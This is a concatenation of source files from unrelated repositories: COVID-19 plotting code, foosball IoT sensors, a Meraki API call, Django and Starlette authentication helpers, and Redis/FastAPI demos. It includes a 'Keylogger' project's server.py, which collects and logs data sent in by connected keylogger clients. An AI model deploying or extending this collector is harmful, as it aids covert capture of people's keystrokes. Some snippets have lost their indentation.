plt.ylim(0.1,None)
plt.title(f'Trajektoria epidemii COVID-19 ({str(val.index[-1]).split()[0]})', fontsize = 16, weight = 'bold', alpha = .75)
plt.ylabel('Średni dzienny przyrost zakażeń na 1 mln mieszkańców\n'+
f'{span}-dniowa wykładnicza średnia krocząca')
plt.xlabel('Liczba przypadków na 1 mln mieszkańców')
plt.legend(loc='upper left')
plt.grid()
plt.savefig('trajektoria_covid.png', dpi=72);
# %% jupyter={"source_hidden": true}
plt.figure(figsize=(10,7))
val = (confpc - recovpc - victpc)
span = 3
val = val.ewm(halflife=span).mean()
for n, c in enumerate(plwiki):
m = ~ (np.isnan(val[c].values) | np.isinf(val[c].values))
plt.plot(val.index[m], val[c].values[m], '-',
lw=3 if c=='Poland' else 2, label=plleg(c),
zorder = 3 if c=='Poland' else 2
)
plt.ylim(1e-2,None)
plt.xlim(pd.Timestamp('2020-03-5'),None)
plt.title(f'Liczba aktywnych przypadków COVID-19 ({str(val.index[-1]).split()[0]})', fontsize = 16, weight = 'bold', alpha = .75)
plt.ylabel(f'Aktywne przypadki na 1 mln. mieszkańców\n({span}-dniowa wykładnicza średnia krocząca)')
plt.xlabel('Data')
plt.grid()
plt.legend(loc='upper left')
plt.savefig('aktywne_przypadki.png', dpi=72);
# %% jupyter={"source_hidden": true}
plt.figure(figsize=(10,7))
val = (confpc - recovpc - victpc)
span = 3
val = val.diff().ewm(halflife=span).mean()
for n, c in enumerate(plwiki):
m = ~ (np.isnan(val[c].values) | np.isinf(val[c].values))
plt.plot(val.index[m], val[c].values[m], '-',
lw=3 if c=='Poland' else 2, label=plleg(c),
zorder = 3 if c=='Poland' else 2
)
plt.ylim(None,None)
plt.axhline(ls='--', label='Zerowy wzrost')
plt.xlim(pd.Timestamp('2020-03-5'),None)
plt.title(f'Wzrost aktywnych przypadków COVID-19 ({str(val.index[-1]).split()[0]})', fontsize = 16, weight = 'bold', alpha = .75)
plt.ylabel(f'Wzrost dzienny aktywnych przypadków na 1 mln. mieszkańców\n({span}-dniowa wykładnicza średnia krocząca)')
plt.xlabel('Data')
plt.grid()
plt.legend(loc='upper left')
plt.savefig('aktywne_wzrost.png', dpi=72);
# %% [markdown]
# ## Experiments
#
# Here are some experiments with modelling based on the remarkably good fit
# of the relative daily growth curves. This is little more than a work in progress.
# And, as with everything here, these are just my experiments to calm my mind.
# %%
c = 'Germany'
m = ~ gr[c].isnull()
plt.plot(confpc[c][m].values, gr[c][m].values,'.-')
(b, a), t = model[c]
c0 = confpc[c][-1]/exp(exp(b*t.max()+a)/b)
ci = gr[c][m].values[-1]/(exp(exp(b*t.max()+a)/b)*exp(b*t.max()+a))
t = linspace(t.min(), t.max()+60, 100)
plt.loglog(exp(exp(b*t+a)/b)*c0,exp(exp(b*t+a)/b)*exp(b*t+a)*ci, '-');
# %%
model
# %%
conf.diff()[-3:][['Poland','US']]
# %%
(conf-recov-vict)[-3:][['Poland','US']]
# %%
``` |
{
"source": "jockaayush/Keylogger",
"score": 3
} |
#### File: jockaayush/Keylogger/server.py
```python
import socket
from _thread import *
from sys import exit
host = ''
port = 55555 #Update it
log_file = '/root/Desktop/server_log.txt' #Update it
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.bind((host,port))
except socket.error as e:
print(str(e))
exit(1)
sock.listen(5)
print('Waiting...')
def threaded_client(conn):
    global a
while True:
data = conn.recv(2048)
if not data:
break
# print("Received from ("+ conn.getpeername()[0] + ":"+ str(conn.getpeername()[1])+") ->" + data.decode('utf-8'))
        if data.decode('utf-8') == "Connection Closed":
            a.remove(conn.getpeername())
            break
fopen = open(log_file,'a')
fopen.write("From("+ conn.getpeername()[0] + ":"+ str(conn.getpeername()[1])+")->" + data.decode('utf-8'))
fopen.write('\n')
fopen.close()
conn.shutdown(1)
conn.close()
a = []
try :
while True:
conn, addr = sock.accept()
a.append(addr)
print('connected to: '+addr[0]+':'+str(addr[1]))
start_new_thread(threaded_client,(conn,))
print(a)
except KeyboardInterrupt:
    sock.shutdown(0)
    sock.close()
``` |
{
"source": "jock-dalby/pythonTreehouse",
"score": 4
} |
#### File: pythonTreehouse/example_apps/even_or_odd_loop.py
```python
import random
def even_odd(num):
# If % 2 is 0, the number is even.
# Since 0 is falsey, we have to invert it with not.
return not num % 2
start = 5
while True:
rand_number = random.randint(1,99)
if start == 0:
        break
elif even_odd(rand_number):
print("{} is even".format(rand_number))
else:
print("{} is odd".format(rand_number))
    start -= 1
``` |
{
"source": "JockDaRock/IoT_Foosball_Player2",
"score": 3
} |
#### File: JockDaRock/IoT_Foosball_Player2/player2.py
```python
import RPi.GPIO as GPIO
import json
import paho.mqtt.client as mqtt
import time
import asyncio
thread = None
score_topic = "foosball/score"
speed_topic = "foosball/speed"
# 192.168.195.7 was IR 829 Broker
broker_ip = "10.8.182.131" # <--- Please change IP to match the location of your MQTT broker
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
ir = 15
ir2 = 18
mqttc = mqtt.Client()
mqttc.connect(broker_ip)
mqttc.loop_start()
GPIO.setup(ir, GPIO.IN, GPIO.PUD_UP)
GPIO.setup(ir2, GPIO.IN, GPIO.PUD_DOWN)
start = 0
stop = 0
async def data_collect_ir():
GPIO.add_event_detect(ir, GPIO.BOTH, callback=process_edge, bouncetime=5)
def process_edge(channel):
if GPIO.input(channel): # test if pin is high
post_speed(channel)
else:
post_score(channel)
def post_score(channel):
global start
start = time.time()
print("Start time is:")
print(start)
brokerMessage = {'Status': 'scored', 'Player': '2', 'Score': 1, 'Data': '0'}
print("message sent")
mqttc.publish(score_topic, json.dumps(brokerMessage))
def post_speed(channel):
global stop
stop = time.time()
print("Stop time is:")
print(stop)
if stop > start:
elapsed = stop - start
print("Elapsed time is:")
print(elapsed)
speed = .0345 / elapsed # meters per second
mph = 2.23694 * speed # convert meters/s to mph
print("posting speed")
print(mph)
brokerMessage = {'Status': 'speed', 'Speed': mph}
mqttc.publish(speed_topic, json.dumps(brokerMessage))
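# Worked example of the conversion above (illustrative numbers only): with the two
# IR gates 0.0345 m apart, an elapsed time of 0.01 s gives 0.0345 / 0.01 = 3.45 m/s,
# and 3.45 * 2.23694 is about 7.72 mph.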
if __name__ == '__main__':
# data_collect()
loop = asyncio.get_event_loop()
# tasks = [asyncio.ensure_future(data_collect_ir()), asyncio.ensure_future(data_collect_ir2())]
tasks = [asyncio.get_event_loop().run_until_complete(data_collect_ir())]
loop.run_forever()
print("started")
``` |
{
"source": "JockDaRock/meraki_snort_blocklist_check",
"score": 3
} |
#### File: JockDaRock/meraki_snort_blocklist_check/meraki_controller.py
```python
import requests
def meraki_network_traffic(net_ID, api_key, time_span):
url = "https://api.meraki.com/api/v1/networks/{0}/traffic".format(net_ID)
querystring = {"timespan": time_span}
headers = {
'Accept': "*/*",
'X-Cisco-Meraki-API-Key': api_key,
}
response = requests.request("GET", url, headers=headers, params=querystring)
#insert logging here
return response.json()
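# Illustrative usage sketch (not part of the original file); the network ID,
# API key and timespan below are placeholder values.
if __name__ == "__main__":
    sample_traffic = meraki_network_traffic(
        net_ID="N_1234567890",       # hypothetical network ID
        api_key="0123456789abcdef",  # hypothetical Meraki API key
        time_span=7200,              # assumed to be a timespan in seconds (last two hours)
    )
    print(sample_traffic)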
``` |
{
"source": "jocke45/COD-BOT",
"score": 3
} |
#### File: COD-BOT/src/handle_data.py
```python
import discord
import json
import get_data
# Get the data we are going to handle
data: dict = get_data.get_data()
def get_best_aim(player):
""""""
return data
def get_level(player):
"""Returns player level as a float"""
return data['level']
def get_stats(player):
"""Get certain stats for the player"""
# TODO
return "not done"
def get_suicides(player):
"""Return number of suicides for the player as a float"""
return data['lifetime']['all']['properties']['suicides']
def get_wins(player):
"""Return number of wins for the player as a float"""
return data['lifetime']['mode']['br']['properties']['wins']
def get_level_embed(player):
player_level = str(int(get_level(player)))
embed = discord.Embed()
embed.add_field(name='Level', value='Player ' + player + ' is level ' + player_level, inline=True)
return embed
def get_stats_embed(player):
player_stats = get_stats(player)
embed = discord.Embed()
embed.add_field(name='Stats', value=player + ' is level ' + player_stats, inline=True)
return embed
def get_wins_embed(player):
player_wins = str(int(get_wins(player)))
player_suicides = str(int(get_suicides(player)))
embed = discord.Embed()
embed.add_field(name='Wins', value='Player ' + player + ' has won ' + player_wins + ' times!\n They also suicided '
+ player_suicides + ' times...',
inline=True)
return embed
print(data['lifetime']['all']['properties']['suicides'])
``` |
{
"source": "jocke-l/phraseless",
"score": 2
} |
#### File: contrib/django/__init__.py
```python
import os
from base64 import urlsafe_b64encode, urlsafe_b64decode
from django.contrib.auth import get_user_model
from django.utils.deprecation import MiddlewareMixin
from urllib.parse import urlencode
from phraseless.certificates import get_name
from phraseless.certificates import verify_challenge, verify_certificate_chain
class PhraselessChallengeMiddleware(MiddlewareMixin):
def process_response(self, request, response):
if not request.user.is_authenticated:
challenge = urlsafe_b64encode(os.urandom(32)).decode()
request.session['auth_challenge'] = challenge
response['X-Challenge'] = challenge
return response
class PhraselessAuthBackend:
def authenticate(self, request, certificate_chain=None, signature=None):
user_model = get_user_model()
try:
user = user_model.objects.get(
username=get_name(certificate_chain[0])
)
except user_model.DoesNotExist:
return None
valid_chain = verify_certificate_chain(
certificate_chain,
user.certificates.all().to_tuples()
)
valid_challenge_signature = verify_challenge(
urlsafe_b64decode(request.session['auth_challenge']),
signature,
certificate_chain[0]
)
if valid_chain and valid_challenge_signature:
return user
def get_user(self, user_id):
user_model = get_user_model()
try:
user_model.objects.get(pk=user_id)
except user_model.DoesNotExist:
return None
default_app_config = 'phraseless.contrib.django.apps.PhraselessConfig'
```
#### File: contrib/django/views.py
```python
from django.contrib.auth import authenticate as authenticate_
from django.http import HttpResponse
from phraseless.contrib.django.forms import CertificateAuth
def authenticate(request):
form = CertificateAuth(request.POST)
if form.is_valid():
user = authenticate_(
request,
certificate_chain=form.cleaned_data['certificate_chain'],
signature=form.cleaned_data['challenge_signature']
)
else:
user = None
response = HttpResponse()
if user:
response['X-Authenticated'] = 'yes'
else:
response['X-Authenticated'] = 'no'
return response
``` |
{
"source": "jocke-l/respx",
"score": 2
} |
#### File: respx/respx/fixtures.py
```python
try:
import pytest
except ImportError: # pragma: nocover
pass
else:
import asyncio
@pytest.fixture(scope="session")
def session_event_loop():
loop = asyncio.get_event_loop_policy().new_event_loop()
yield loop
loop.close()
``` |
{
"source": "jocke-l/try-default",
"score": 3
} |
#### File: try-default/try_default/tests.py
```python
import unittest
from . import try_default
from ._utils import curried
class Curried(unittest.TestCase):
def test_identity(self):
self.assertEqual(curried(lambda: 1), 1)
self.assertEqual(curried(lambda a: a)(1), 1)
    def test_curried(self):
curried_func = curried(lambda a, b, c: a + b + c)
self.assertEqual(curried_func(1)(2)(3), 6)
self.assertEqual(curried_func(1)(2, 3), 6)
self.assertEqual(curried_func(1, 2, 3), 6)
self.assertEqual(curried_func(1, 2)(3), 6)
class TryDefault(unittest.TestCase):
def test_core_features(self):
self.assertEqual(try_default(lambda: [][1], {IndexError: 0}), 0)
self.assertEqual(try_default(lambda: [1][0], {IndexError: 0}), 1)
def test_parent_catch(self):
def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.assertEqual(try_default(raise_keyboard_interrupt,
{KeyboardInterrupt: 0}), 0)
self.assertEqual(try_default(raise_keyboard_interrupt,
{BaseException: 0}), 0)
def test_reraise_unhandled_exception(self):
with self.assertRaises(IndexError):
try_default(lambda: [][1], {})
def test_args(self):
def get_actual_budget(costs, headroom):
return sum(costs) + headroom
get_budget = try_default(get_actual_budget, {TypeError: 0})
broken_costs = [25, 25, None, 10]
clean_costs = [25, 25, 10]
self.assertEqual(get_budget(broken_costs, 100), 0)
self.assertEqual(get_budget(clean_costs, 100), 160)
def test_empty_args(self):
with self.assertRaises(TypeError):
try_default(lambda a: 1, {TypeError: 1})()
def test_decorator(self):
@try_default({KeyboardInterrupt: 0})
def foo(a, b):
raise KeyboardInterrupt
self.assertEqual(foo(1, 2), 0)
``` |
{
"source": "jocker1854/nepula",
"score": 3
} |
#### File: jocker1854/nepula/chatbot.py
```python
import random
import json
import nltk
import torch
import transformers
from gtts import gTTS
import speech_recognition as sr
import os
import playsound
import config
import pyjokes
from nltk.stem.porter import PorterStemmer
import numpy as np
from torch.utils.data import Dataset, DataLoader
import torch.nn as nn
class Prepare_Data():
def __init__(self, json_file, ignore_words):
self.json_file = json_file
self.patterns = []
self.all_words = []
self.tags = []
self.xy = []
self.X_train = []
self.y_train = []
self.ignore_words = ignore_words
self.stemmer = PorterStemmer()
def tokenize(self, sentence):
return nltk.word_tokenize(sentence)
def stem(self, word):
return self.stemmer.stem(word.lower())
def bag_of_words(self, tokenized_sentence, words):
sentence_words = [self.stem(word) for word in tokenized_sentence]
# initialize bag with 0 for each word
bag = np.zeros(len(words), dtype=np.float32)
for idx, w in enumerate(words):
if w in sentence_words:
bag[idx] = 1
return bag
def load_json(self):
with open(self.json_file, 'r') as file:
self.intents = json.load(file)
return self.intents
@staticmethod
def text_to_speech(text):
print(text)
speaker = gTTS(text=text, lang="en", slow=False)
speaker.save("a.mp3")
playsound.playsound("a.mp3")
os.remove("a.mp3")
def speech_to_text(self):
recognizer = sr.Recognizer()
with sr.Microphone() as source:
self.text_to_speech("listening...")
audio = recognizer.listen(source)
recognizer.pause_threshold = 1
try:
self.text = recognizer.recognize_google(audio)
print(self.text)
except Exception:
self.text = "say that again.."
return self.text
def prs1(self):
for intent in self.load_json()['intents']:
tag = intent['tag']
self.tags.append(tag)
for pattern in intent['patterns']:
w = self.tokenize(pattern)
self.all_words.extend(w)
self.xy.append((w, tag))
pattern = pattern.lower()
self.patterns.append(pattern)
self.all_words = [self.stem(w) for w in self.all_words if w not in self.ignore_words]
self.all_words = sorted(set(self.all_words))
self.tags = sorted(set(self.tags))
for (pattern_sentence, tag) in self.xy:
bag = self.bag_of_words(pattern_sentence, self.all_words)
self.X_train.append(bag)
label = self.tags.index(tag)
self.y_train.append(label)
self.X_train = np.array(self.X_train)
self.y_train = np.array(self.y_train)
return self.tags, self.all_words, self.patterns, self.X_train, self.y_train
class ChatDataset(Dataset):
def __init__(self):
self.prepare = Prepare_Data(json_file, ignore_words)
self.tags, self.all_words, self.patterns, self.X_train, self.y_train = self.prepare.prs1()
self.n_samples = len(self.X_train)
self.x_data = self.X_train
self.y_data = self.y_train
def __getitem__(self, index):
return self.x_data[index], self.y_data[index]
def __len__(self):
return self.n_samples
class NeuralNet(nn.Module):
def __init__(self, input_size, hidden_size, num_classes):
super(NeuralNet, self).__init__()
self.l1 = nn.Linear(input_size, hidden_size)
self.l2 = nn.Linear(hidden_size, hidden_size)
self.l3 = nn.Linear(hidden_size, num_classes)
self.relu = nn.ReLU()
def forward(self, x):
out = self.l1(x)
out = self.relu(out)
out = self.l2(out)
out = self.relu(out)
out = self.l3(out)
return out
class Train():
def __init__(self):
self.num_epochs = config.NUM_EPOCHS
self.batch_size = config.BATCH_SIZE
self.learning_rate = config.LEARNING_RATE
self.input_size = len(X_train[0])
self.hidden_size = config.HIDDEN_SIZE
self.num_classes = len(tags)
self.dataset = ChatDataset()
self.train_loader = DataLoader(dataset=self.dataset,
batch_size=config.BATCH_SIZE,
shuffle=True,
num_workers=0)
self.model = NeuralNet(self.input_size, self.hidden_size, self.num_classes)
self.criterion = nn.CrossEntropyLoss()
self.optimizer = torch.optim.Adam(self.model.parameters(), lr=config.LEARNING_RATE)
self.prepare = Prepare_Data(json_file, ignore_words)
self.tags, self.all_words,_,_,_ = self.prepare.prs1()
def train(self):
for epoch in range(self.num_epochs):
global loss
for (words, labels) in self.train_loader:
words = words.to(config.DEVICE)
labels = labels.to(dtype=torch.long).to(config.DEVICE)
outputs = self.model(words)
loss = self.criterion(outputs, labels)
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
if (epoch + 1) % 100 == 0:
print(f'Epoch [{epoch + 1}/{self.num_epochs}], Loss: {loss.item():.4f}')
print(f'final loss: {loss.item():.4f}')
data = {
"model_state": self.model.state_dict(),
"input_size": self.input_size,
"hidden_size": self.hidden_size,
"output_size": self.num_classes,
"all_words": self.all_words,
"tags": self.tags
}
if loss < 0.001:
FILE = "data.pth"
torch.save(data, FILE)
print(f'training complete. file saved to {FILE}')
class ChatBot():
def __init__(self):
self.tools = Prepare_Data(json_file, ignore_words)
self.speech_to_text = self.tools.speech_to_text
self.text_to_speech = self.tools.text_to_speech
self.intents = self.tools.load_json()
#self.tags, self.all_words, self.patterns, self.X_train, self.y_train =
self.tags = self.tools.tags
self.tokenize = self.tools.tokenize
self.bag_of_words = self.tools.bag_of_words
def load_model(self, model_file):
data = torch.load(model_file)
input_size = data["input_size"]
hidden_size = data["hidden_size"]
output_size = data["output_size"]
model_state = data["model_state"]
tags = data["tags"]
model = NeuralNet(input_size, hidden_size, output_size).to(config.DEVICE)
model.load_state_dict(model_state)
model.eval()
return model, tags
def chat(self):
nlp = transformers.pipeline("conversational", model="microsoft/DialoGPT-large", pretrained=True)
os.environ["TOKENIZERS_PARALLELISM"] = "true"
while True:
            sentence = self.speech_to_text()
            # default response; avoids a NameError when neither a joke nor an
            # intent pattern matches, and falls through to the DialoGPT reply
            res = "none"
if any(i in sentence for i in ["ok quit", "quit", "shutup", "go home"]):
r = ["have fun", "see you later", "ok bye"]
self.text_to_speech(random.choice(r))
quit()
elif "joke" in sentence:
joke = pyjokes.get_joke(language="en", category="all")
res = joke
if any(i in sentence for i in patterns):
in_ = self.tokenize(sentence)
X = self.bag_of_words(in_, all_words)
X = X.reshape(1, X.shape[0])
X = torch.from_numpy(X).to(config.DEVICE)
model, tags = self.load_model(model_file)
output = model(X)
_, predicted = torch.max(output, dim=1)
tag = tags[predicted.item()]
probs = torch.softmax(output, dim=1)
prob = probs[0][predicted.item()]
if prob.item() > 0.75:
for intent in self.intents['intents']:
if tag == intent['tag']:
res = random.choice(intent['responses'])
else:
res = "none"
if any(i in res for i in ["none", "None"]):
chat = nlp(transformers.Conversation(sentence), pad_token_id=50256)
res = str(chat)
res = res[res.find("bot >> ") + 6:].strip()
self.text_to_speech(res)
if __name__ == '__main__':
json_file = "myintents.json"
ignore_words = ["?", "!"]
prepare = Prepare_Data(json_file, ignore_words)
tags, all_words, patterns, X_train, y_train = prepare.prs1()
# for training uncomment
#train = Train()
#train.train()
model_file = "data.pth"
#chat
chat_bot = ChatBot()
chat_bot.chat()
``` |
{
"source": "Jocker271/advent-of-code",
"score": 3
} |
#### File: 2015/day_02/day_2.py
```python
import os
def get_challenge_input():
'''Read input.txt and return content as List'''
input_file = f'{os.path.dirname(__file__)}\\input.txt'
with open(input_file, encoding='utf-8', mode='r') as file:
lines = file.read().split("\n")
return lines
def part_one(puzzle):
'''Solving the first challenge'''
total_paper = 0
for line in puzzle:
length, width, height = [int(i) for i in line.split('x')]
a = length * width
b = width * height
c = height * length
slack = min(int(s) for s in [a, b, c])
present_paper = 2 * a + 2 * b + 2 * c + slack
total_paper += present_paper
return total_paper
def part_two(puzzle):
'''Solving the second challenge'''
total_ribbon = 0
for line in puzzle:
length, width, height = [int(i) for i in line.split('x')]
sides = [length, width, height]
sides.remove(max(sides))
result = 2 * sides[0] + 2 * sides[1] + length * width * height
total_ribbon += result
return total_ribbon
puzzle = get_challenge_input()
print(f'Part 1: {part_one(puzzle)}')
print(f'Part 2: {part_two(puzzle)}')
```
#### File: 2015/day_06/day_6.py
```python
import os
import re
import numpy as np
def get_challenge_input():
'''Read input.txt and return content as List'''
input_file = f'{os.path.dirname(__file__)}\\input.txt'
with open(input_file, encoding='utf-8', mode='r') as file:
lines = file.read().split('\n')
return lines
def part_one(puzzle):
'''Solving the first challenge'''
array = np.zeros((1000,1000), dtype=bool)
regex = r'(\w+) (\d+),(\d+) through (\d+),(\d+)'
for line in puzzle:
command, x0, y0, x1, y1 = re.search(regex, line).groups()
corners = [[x0, x1], [y0, y1]]
x_slice, y_slice = [slice(int(a), int(b) + 1) for a, b in corners]
if command == 'toggle':
array[x_slice, y_slice] = np.invert(array[x_slice, y_slice])
else:
array[x_slice, y_slice] = ['off', 'on'].index(command)
return sum(sum(array))
def part_two(puzzle):
'''Solving the second challenge'''
array = np.zeros((1000,1000), dtype=int)
regex = r'(\w+) (\d+),(\d+) through (\d+),(\d+)'
for line in puzzle:
command, x0, y0, x1, y1 = re.search(regex, line).groups()
corners = [[x0, x1], [y0, y1]]
x_slice, y_slice = [slice(int(a), int(b) + 1) for a, b in corners]
transform = {'on': 1, 'off': -1, 'toggle': 2}
array[x_slice, y_slice] += transform.get(command)
array[array < 0] = 0 # cannot be less than 0 bright
return sum(sum(array))
puzzle = get_challenge_input()
print(f'Part 1: {part_one(puzzle)}')
print(f'Part 2: {part_two(puzzle)}')
```
#### File: 2015/day_10/day_10.py
```python
import re
def look_and_say(sequence, loops):
regex = re.compile(r'((\d)\2*)')
sequence = str(sequence)
def replace(match_obj):
match = match_obj.group(1)
return str(len(match)) + match[0]
for loop in range(loops):
sequence = regex.sub(replace, sequence)
return sequence
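# Worked example (illustrative): starting from 1 the sequence reads
# 1 -> 11 -> 21 -> 1211 -> 111221, so look_and_say(1, 4) returns '111221'.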
puzzle = 1113222113 # challenge input is very short this day
part_one = look_and_say(puzzle, 40)
print(f'Part 1: {len(part_one)}')
part_two = look_and_say(part_one, 10)
print(f'Part 2: {len(part_two)}')
################################ code relicts ################################
def look_and_say_first_try(sequence, loops):
'''My first attempt to solve the puzzle, but too slow for 50 loop passes.
So I had to find a better way -> look_and_say()
'''
sequence = str(sequence)
def count_char_in_row(sub_sequence):
char = sub_sequence[0]
count = 1
if len(sub_sequence) > 2 and char == sub_sequence[1]:
count += count_char_in_row(sub_sequence[1:])
return count
for loop in range(loops):
new_sequence = []
skip = 0
for idx, char in enumerate(sequence):
if skip > 0:
skip -= 1
else:
count = count_char_in_row(sequence[idx:])
new_sequence.extend([str(count), char])
skip = count - 1
sequence = "".join(new_sequence)
return sequence
```
#### File: Jocker271/advent-of-code/template.py
```python
import os
from datetime import datetime
def main():
'''Retrieves user input and executes this script.'''
while True:
print('For which year do you want to create the file structure?')
year = input("Year: ") or str(datetime.now().year)
if year.isdigit() and len(year) == 4:
create_file_structure(year)
break
print(f'{year} is not a possible value.')
print('✓ File structure successfully created')
def create_file_structure(year):
    '''Creates python and text files for each day in a separate folder.'''
parent = os.getcwd()
folder_path = os.path.join(parent, year)
if not os.path.exists(folder_path):
os.mkdir(folder_path)
template = get_template().replace('{year}', year)
for day in range(1, 26):
day_folder = os.path.join(folder_path, f'day_{str(day).zfill(2)}')
if not os.path.exists(day_folder):
os.mkdir(day_folder)
py_file_path = os.path.join(day_folder, f'day_{str(day)}.py')
txt_file_path = os.path.join(day_folder, 'input.txt')
with open(py_file_path, encoding='utf-8', mode='w+') as py_file:
py_file.write(template.replace('{day}', str(day)))
#py_file.close()
open(txt_file_path, encoding='utf-8', mode='x').close()
def get_template():
'''Returns template inside this file (look at the end) as String.'''
template = ''
with open(__file__, encoding='utf-8', mode='r') as this_file:
start_template = False
for line in this_file:
if start_template:
template += line[2:] if len(line) > 2 else '\n'
elif line == '# --- TEMPLATE STARTS HERE ---\n':
start_template = True
return template
main()
# --- TEMPLATE STARTS HERE ---
# '''
# Created on {year}-12-{day}
# by <NAME> - (Jocker271)
# --------------------------------
# Find this challenge at https://adventofcode.com/{year}/day/{day}
# '''
# import os
# def get_challenge_input():
# '''Read input.txt and return content as List'''
# input_file = f'{os.path.dirname(__file__)}\\input.txt'
# with open(input_file, encoding='utf-8', mode='r') as file:
# lines = file.read().split('\n')
# # lines = [int(line) for line in lines]
# return lines
# def part_one(puzzle):
# '''Solving the first challenge'''
# result = 0
# for line in puzzle:
# if line:
# result += 1
# return str(result)
# def part_two(puzzle):
# '''Solving the second challenge'''
# result = 0
# for idx, line in enumerate(puzzle):
# if line:
# result = idx
# break
# return str(result)
# puzzle = get_challenge_input()
# print(f'Part 1: {part_one(puzzle)}')
# print(f'Part 2: {part_two(puzzle)}')
``` |
{
"source": "Jockero1991/litecart-login",
"score": 2
} |
#### File: litecart-login/litecart-login/search_errors.py
```python
import pytest
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support import expected_conditions as EC
from time import sleep
import os
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.support.events import EventFiringWebDriver, AbstractEventListener
@pytest.fixture
def driver(request):
chrome_options = Options()
chrome_options.add_argument("--window-size=1920,1080")
caps=DesiredCapabilities.CHROME
caps['loggingPrefs']={'browser': 'ALL'}
#caps['loggingPrefs'] = {'performance': 'ALL'}
wd = webdriver.Chrome(
chrome_options=chrome_options, desired_capabilities = caps
)
print(caps)
request.addfinalizer(wd.quit)
return wd
def get_browser_logs(driver, typ):
logs=[]
for l in driver.get_log(typ):
logs.append(l)
#print(l)
return logs
def test_login(driver):
wait = WebDriverWait(driver, 4)
    print('Opening the admin page')
    driver.get('http://localhost/litecart/admin/')
    sleep(2)
    print('Entering the username')
    wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@name="username"]'))).send_keys('admin')
    print('Entering the password')
    wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@name="password"]'))).send_keys('<PASSWORD>')
    print('Clicking the login button')
wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@name="login"]'))).click()
sleep(2)
check_console_errors(driver)
def check_console_errors(driver):
print("Переходим в каталог")
cataloges = driver.find_elements_by_xpath('//*[@id="app-"]/a')[1].get_attribute("href")
driver.find_elements_by_xpath('//*[@id="app-"]')[1].click()
sleep(0.5)
print("Разворачиваем каталог с товарами")
driver.find_element_by_link_text("Rubber Ducks").click()
sleep(1)
ducks = driver.find_elements_by_xpath('//*[@class="row"]/td[3]/a')
for i in range(1, len(ducks)):
logs = []
ducks[i].click()
sleep(2)
current_duck = driver.find_element_by_xpath('//*[@id="tab-general"]/table/tbody/tr[2]/td/span/input').get_attribute('value')
print("Переходим в каталог")
driver.get(cataloges)
sleep(2)
print("Разворачиваем каталог с товарами")
driver.find_element_by_link_text("Rubber Ducks").click()
ducks = driver.find_elements_by_xpath('//*[@class="row"]/td[3]/a')
logs = get_browser_logs(driver, 'browser')
if logs:
            print('This duck: ' + current_duck + ' has browser console log entries!')
print(logs)
``` |
{
"source": "jockerz/fastapi-demo-aioredis",
"score": 2
} |
#### File: fastapi-demo-aioredis/app/routes.py
```python
from fastapi import APIRouter, Depends
from app.deps import get_redis
router = APIRouter()
@router.post('/post')
async def save_key_value(
key: str, value: str, redis=Depends(get_redis)
):
await redis.set(key, value)
return {'success': True, 'data': {key: value}}
@router.get('/get')
async def get_value(key: str, redis=Depends(get_redis)):
value = await redis.get(key)
return {
'success': True if value else False,
'data': {key: value}
}
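# Illustrative usage sketch (assumed, not part of the original file), with the app
# served locally and Redis reachable through the get_redis dependency:
#   POST /post?key=color&value=blue -> {"success": true, "data": {"color": "blue"}}
#   GET  /get?key=color             -> reads the value back from Redis (it may come
#                                      back as bytes, depending on how the client
#                                      decodes responses)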
``` |
{
"source": "jockerz/redis_simple_orm",
"score": 2
} |
#### File: RSO/txredisapi/model.py
```python
from typing import Union
from dataclasses import asdict
from txredisapi import BaseRedisProtocol, ConnectionHandler
from twisted.internet.defer import inlineCallbacks, returnValue
from RSO.base import BaseModel
from .index import ListIndex
class Model(BaseModel):
@inlineCallbacks
def is_exist(self, redis: ConnectionHandler):
result = yield redis.exists(self.redis_key)
returnValue(bool(result))
@inlineCallbacks
def save(self, redis: Union[BaseRedisProtocol, ConnectionHandler]):
if isinstance(redis, ConnectionHandler):
pipe = yield redis.multi()
else:
raise NotImplementedError
pipe.hmset(self.redis_key, self.to_redis())
for index_class in self.__indexes__ or []:
if getattr(self, index_class.__key__, None) is None:
continue
index = index_class.create_from_model(self)
yield index.save_index(pipe)
yield pipe.commit()
@inlineCallbacks
def extended_save(
self, redis: Union[BaseRedisProtocol, ConnectionHandler]
):
"""extended save function to avoid multiple push on list index"""
list_index_map = {}
for index_class in self.__indexes__ or []:
if not issubclass(index_class, ListIndex):
continue
index = index_class.create_from_model(self)
model_key_value = getattr(self, self.__key__, None)
if model_key_value is None:
exist_on_index = False
else:
exist_on_index = yield index.is_exist_on_list(
redis, model_key_value
)
list_index_map[index] = exist_on_index
if isinstance(redis, ConnectionHandler):
pipe = yield redis.multi()
else:
raise NotImplementedError
pipe.hmset(self.redis_key, self.to_redis())
for index_class in self.__indexes__ or []:
if getattr(self, index_class.__key__, None) is None:
continue
index = index_class.create_from_model(self)
yield index.save_index(pipe)
# avoid duplicate on index queue list
for index, exist_on_index in list_index_map.items():
if exist_on_index is True:
model_key_value = getattr(self, self.__key__)
yield index.remove_from_list(pipe, model_key_value)
yield pipe.commit()
@classmethod
@inlineCallbacks
def search(cls, redis: ConnectionHandler, value):
redis_key = cls._to_redis_key(value)
result = yield redis.exists(redis_key)
if bool(result):
redis_data = yield redis.hgetall(redis_key)
returnValue(cls(**redis_data))
else:
returnValue(None)
def dict(self):
return asdict(self)
def to_redis(self):
dict_data = self.dict()
for key, value in dict_data.copy().items():
if value is None:
del dict_data[key]
return dict_data
@inlineCallbacks
def delete(self, redis: Union[BaseRedisProtocol, ConnectionHandler]):
if isinstance(redis, ConnectionHandler):
pipe = yield redis.multi()
else:
raise NotImplementedError
for index_class in self.__indexes__ or []:
if getattr(self, index_class.__key__) is None:
continue
index = index_class.create_from_model(self)
index.remove_from_index(pipe)
pipe.delete(self.redis_key)
yield pipe.commit()
``` |
{
"source": "jockerz/Starlette-Login",
"score": 2
} |
#### File: Starlette-Login/starlette_login/utils.py
```python
import hmac
import typing
from datetime import timedelta
from hashlib import sha512
from urllib.parse import quote, urlparse, urlunparse
